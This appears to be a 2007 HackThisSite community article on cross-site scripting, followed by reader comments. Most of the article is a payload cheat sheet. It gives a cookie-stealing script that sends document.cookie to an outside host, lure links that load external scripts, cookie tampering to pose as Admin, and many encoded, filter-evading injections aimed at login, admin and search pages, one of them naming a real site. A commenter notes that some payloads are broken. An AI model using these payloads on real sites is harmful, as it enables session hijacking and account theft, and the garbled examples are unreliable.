Hack This Site

Cross Site Scripting exsistance is because of the lack of filtering engines to user inputs at websites on forms.

Hackers Evil Links

<a href="[http://<XSS-host]/xssfile?evil request">Free Laptop!</a>
<iframe src="[http://<XSS-host]/xssfile?evil request">Free Laptop!</iframe>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://www.Site.com/xss.js"></SCRIPT>

XSS Cookie theft Javascript

http://host/a.php?variable="><script>document.location='http://www.mysite.com/cgi-bin/cookie.cgi?
'%20+document.cookie</script>

Moding Cookies

(Put in your browsers address bar)
CODE :

java<b></b>script:void(document.cookie="username=Admin")

How to Search for Vul Hosts

CODE :

[host]/<script>alert("XSS")</script> [host]/<script>alert('XSS')</script>/ [host]/<script>alert('XSS')</script>. [host]/<script>alert('XSS')</script> [host]/<script>alert('XSS')</script> [host]/perl/<sCRIPT>alert("d")</sCRIPT>.pl [host]/<sCRIPT>alert("d")</sCRIPT> [host]/<73CRIPT>alert("dsf")</73CRIPT> [host]/<73CRIPT>alert('dsf')</73CRIPT> [host]/</sCRIP/T>alert("dsf")<///sCRIP/T> [host]/</sCRIP/T>alert('dsf')<///sCRIP/T> <script>java<b></b>script:alert(documentt.cookie)</script> <script>java<b></b>script:alert("XSS")</script> "<script>alert()</script>"This Site is not Secure! [host]/?<script>alert('XSS')</script>

- Also use "?" post request after the host.

WebServers XSS

Many webservers have default pages to folders that will look for a file.

CODE :

[host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".bas [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".asp [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".jsp [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".htm [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".html [host]/[folder]/"<script%20language=vbscript>msgbox%20sadas</script>".[ext]

A common place for an XSS hole is inside a server default example files, such as:

CODE :

[host]/cgi/example?test=<script>alert('xss')</script>

Most common places to find XSS in are the search files of servers.

CODE :

[host]/search.php?searchstring=<script>alert('XSS')</script> [host]/search.php?searchstring="><script>alert('XSS')</script> [host]/search.php?searchstring='><script>alert('XSS')</script>

Social Engineering XSS

Using the characters instead may fool the filters and allow XSS to work.

CODE :

[host]/%3cscript%3ealert('XSS')%3c/script%3e [host]/%3c%53cript%3ealert('XSS')%3c/%53cript%3e [host]/%3c%53cript%3ealert('XSS')%3c%2f%53cript%3e [host]/%3cscript%3ealert('XSS')%3c/script%3e [host]/%3cscript%3ealert('XSS')%3c%2fscript%3e [host]/%3cscript%3ealert(%27XSS%27)%3c%2fscript%3e [host]/%3cscript%3ealert(%27XSS%27)%3c/script%3e [host]/%3cscript%3ealert("XSS")%3c/script%3e [host]/%3c%53cript%3ealert("XSS")%3c/%53cript%3e [host]/%3c%53cript%3ealert("XSS")%3c%2f%53cript%3e [host]/%3cscript%3ealert("XSS")%3c/script%3e [host]/%3cscript%3ealert("XSS")%3c%2fscript%3e [host]/%3cscript%3ealert(%34XSS%34)%3c%2fscript%3e [host]/%3cscript%3ealert(%34XSS%34)%3c/script%3e [host]/?%3cscript%3ealert('XSS')%3c/script%3e

- Also use "?" post request after the host.

100% encoded

CODE :

[host]/?%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

CODE :

[host]/?%27%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

CODE :

[host]/%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

Another form of encoding is: <script>alert(document.cookie)</script>

< is encoded as: <
> is encoded as: >

CODE :

%3Cscript%3Ealert(%22XSS%22)%3C/script%3E <script>alert("XSS")</script> <script>alert("XSS")</script> <script>alert(%34XSS%34)</script> <script>alert('XSS')</script>

www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Any of the XSS requests presented above could be used on any asp, cfm, jsp, cgi, php or any other active html file.

CODE :

[host]/forum/post.asp?<script>alert('XSS')</script> [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e [host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e [host]/forum/post.asp?<script>alert("XSS")</script>

Finding errors such as inputting a string instead of a number or "" or "/" instead of a string, or a very long string & a very large number. All this malformed parameters can help us find the place to inject XSS script.

Tag Closer

The "Tag Closer" method is used by inputing non-alphabetic and non-numeric chars
inside form's input text boxes. This chars could be: ,/,~,!,#,$,%,^,&,-,[,],null(char 255),.(dot)
But the chars that mostly does the job is either " or '. What we do is just insert "> or '> inside
a text box instead of our name/email/username/password and etc...

CODE :

[host]/admin/login.asp?username="><script>alert('XSS')</script>&password=1234 [host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script> [host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~"> < /textarea>--><script>alert('XSS')</script> [host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script> [host]/admin/login.asp?username='><script>alert('XSS')</script>&password=1234 [host]/admin/login.asp?username=admin&password='><script>alert('XSS')</script> [host]/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&mainnews=~~~~'></textarea>--> < script>alert('XSS')</script> [host]/search.php?action=soundex&firstname='><script>alert(document.cookie)</script>

This mainly works on the servers root:

CODE :

[host]/?"><script>alert('XSS')</script> [host]/?'><script>alert('XSS')</script> [host]/?--><script>alert('XSS')</script>

About <plaintext>

Another trick for exploiting an XSS was found by putting a <plaintext> tag
after the xss code. Sometimes that makes it easie to exploit.

CODE :

[host]/?"><script>alert('XSS')</script><plaintext> [host]/?'><script>alert('XSS')</script><plaintext> [host]/admin/login.asp?username="><script>alert('XSS')</script><plaintext>&password=1234 [host]/admin/login.asp?username=admin&password="><script>alert('XSS')</script><plaintext> [host]/forum/post.asp?<script>alert('XSS')</script><plaintext> [host]/forum/post.asp?%3cscript%3ealert('XSS')%3c/script%3e<plaintext> [host]/forum/post.asp?%3cscript%3ealert(%27XSS%27)%3c/script%3e<plaintext> [host]/forum/post.asp?%3cscript%3ealert(%34XSS%34)%3c/script%3e<plaintext> [host]/forum/post.asp?<script>alert("XSS")</script><plaintext> [host]/search.php?action=soundex&firstname="><script>alert(document.cookie)</script> & lt;plaintext> www.pbs.org/search/search_results.html?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E %3Cplaintext%3E

Simple Codes just incase some of them do-not seem to work:

CODE :

< /title><script>alert("XSS");</script><title><plaintext> < script>alert(document.cookie)</script><plaintext>

Security Conclusion

Repace:

CODE :

< with < > with > & with & " with &quote;

Possible XSS:

CODE :

<applet> <frameset> <layer> <body> < html> <ilayer> <embed> <iframe> < meta> <frame> <img> <object> < script> <style>

The best protection against it is filtering and removing from recieved input any non-alphabetic and non-numeric chars
and testing to make sure that the filtering system works! "To make XSS and SQL Injections Leet you must apply Social Engineering"

by Doz

Comments:
Published: 21 comments.

jourdie - 10:08 am Wednesday August 22nd, 2007

That was pretty decent, a little messy though, try and use some tabs to make it easier to read..8/10!

Cypher101 - 06:41 pm Wednesday August 22nd, 2007

I had to give it a 7 to avoid a warn from faith. I just didn\'t have a good enough reason to explain a 6.....???

lordofwhee - 07:13 pm Wednesday August 22nd, 2007

Doesn\'t really explain anything, just gives a list of examples and a small explanation of certain aspects, not enough to actually understand XSS, or, really, any of the exploits themselves.

ScrAm - 08:06 pm Wednesday August 22nd, 2007

You didn\'t use any of the BBCode, especially [code][/code] tags.. it would\'ve made it look a LOT neater.

yourmysin - 09:30 pm Wednesday August 22nd, 2007

This article was kind of messy, ill try to clean it up a bit. Pulse, it seems you do not understand BBcode, or do not know we have it, but please use it. Your content is great, but the formatting is now.

In my opinion there was to many example links, and encoded ascii.

dialup_haxor - 12:19 am Thursday August 23rd, 2007

It\'s OK, but could be a lot better. -3 for formatting.

Jheshka - 02:17 am Thursday August 23rd, 2007

[code] BBCodes + better spacing would\'ve made this easier to read, but a lot of good data. Good job :D

lordofwhee - 03:41 am Thursday August 23rd, 2007

Wow, now everyone is just voting 7 and 8 to avoid having to explain themselves.

Kinda defeats the purpose of the voting system...

Bliepo32 - 05:45 am Thursday August 23rd, 2007

But you are still going on with giving 1\'s. This is, according to you, because the articles are of low quality.

I however believe otherwise. Most of the articles are of reasonable quality, and are worth a 7, or at least a 6. I believe you just seem to think it\'s funny to give people a 1, or you want \'revenge\' for some reason. Maybe because your articles have never been accepted? I don\'t even know if you tried to make an article.

Maybe it would be a good idea to make an article yourself, so you know how hard that is. If you do so, then I will give you a 1. So you know how it feels.

I also think it would be a good idea to take your voting powers from you. Unfortunately, I am not the person to make this decision.

Edit: Wow at his profile comments? ehm... what does wow mean?

liuyuan - 05:48 am Thursday August 23rd, 2007

Bliepo32, wow at his profile comments....

igykalen - 10:05 pm Friday August 24th, 2007

Why does every other site have the ability to weed out crazy votes using a system, but a site created by hackers can\'t figure one out?
A one means it sucks. No need for an explanation. And why 7? shouldn\'t 5 be middle. Now every article will end up great! bad system. I think the ones help counter the 10\'s given for no reason.

For system example
http://www.imdb.com/title/tt0120815/ratings

Cypher101 - 11:29 pm Friday August 24th, 2007

What is iVote? Who cares what others voted. And isn\'t the internet about anoymonity and privacy. Why should anyone be allowed to see everyone else\'s votes?
especially when many already tell you what they voted.

Not to mention it makes it hard to look at when trying to read any of the comments. Whose brainchild was this idea?

Sorry to post off topic. But so does iVote.

kjar23 - 10:35 am Tuesday October 02nd, 2007

i kinda find this hard if anyone can help me with xss thank you

kjar23 - 10:36 am Tuesday October 02nd, 2007

i kinda find this hard if anyone can help me with xss thank you

BiLLo - 01:12 am Friday October 05th, 2007

would a good way to stop xss on a chatbox be to filter </script> ?

diggan - 08:27 pm Monday November 19th, 2007

Thanks :D

cleverhacker - 05:21 pm Sunday March 09th, 2008

its great but can some one help me :D

AKI_SER - 03:50 pm Thursday December 25th, 2008

Your program isn't compatible with vista,or just mine comp... :(

Wolfine - 11:07 am Sunday December 28th, 2008

Thanks for Sharing!!! 10/10!

conscience - 12:23 pm Saturday July 18th, 2009

something's fishy with you codes... unfortunatelly this all looks like a mess. these are non-working and therefore non-existing techniques.

E.g. you wrote:

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://www.Site.com/xss.js"></SCRIPT>

Case 1: App does not filter <script> tags.
In this case, you really don't need to shit around, just simply type <script>codehere</script>

Case 2: App filters <script> tags.
So what would remain?
document.write("<SCRI");PT SRC="http://www.Site.com/xss.js">

Due to the missing <script> tag, the browser will never execute the "document.write" command, so the remaining ruins of the code will be actually printed on the page.

And so on with the rest of this article.

I'm terribly sorry to say, but I've to give you a 1, 'cause it's abs-ly worthless, and really confuses "newcomers".

conscience - 12:49 pm Saturday July 18th, 2009

@BiLLo "would a good way to stop xss on a chatbox be to filter </script> ?"

No. In case of an XSS <script> attack, the result would be and open-ended script, therefore destroying everything on the site after the attacker's <script> tag.

A more efficient way is to convert <'s to <'s that are not processed by the browser. You'll have to convert all the formats of "<" of course.
Check out some XSS references on the web for the set of characters that should be filtered.

However converting < to < will prevent the user adding any HTML tags to the source code, this way raising difficulties to engage XSS.

HackThisSite is the collective work of the HackThisSite staff, licensed under a CC BY-NC license.
We ask that you inform us upon sharing or distributing.

_{Page Generated: Sun, 14 Dec 2025 13:46:09 +0000
Web Node: www02 | Page Gen: 0.071s | DB: 10q
Current Code Revision: v3.2.5
(Sun, 22 May 2016 20:29:51 +0000)}

Donate

Challenges

Get Informed

Get Involved

Communicate

About HTS

Partners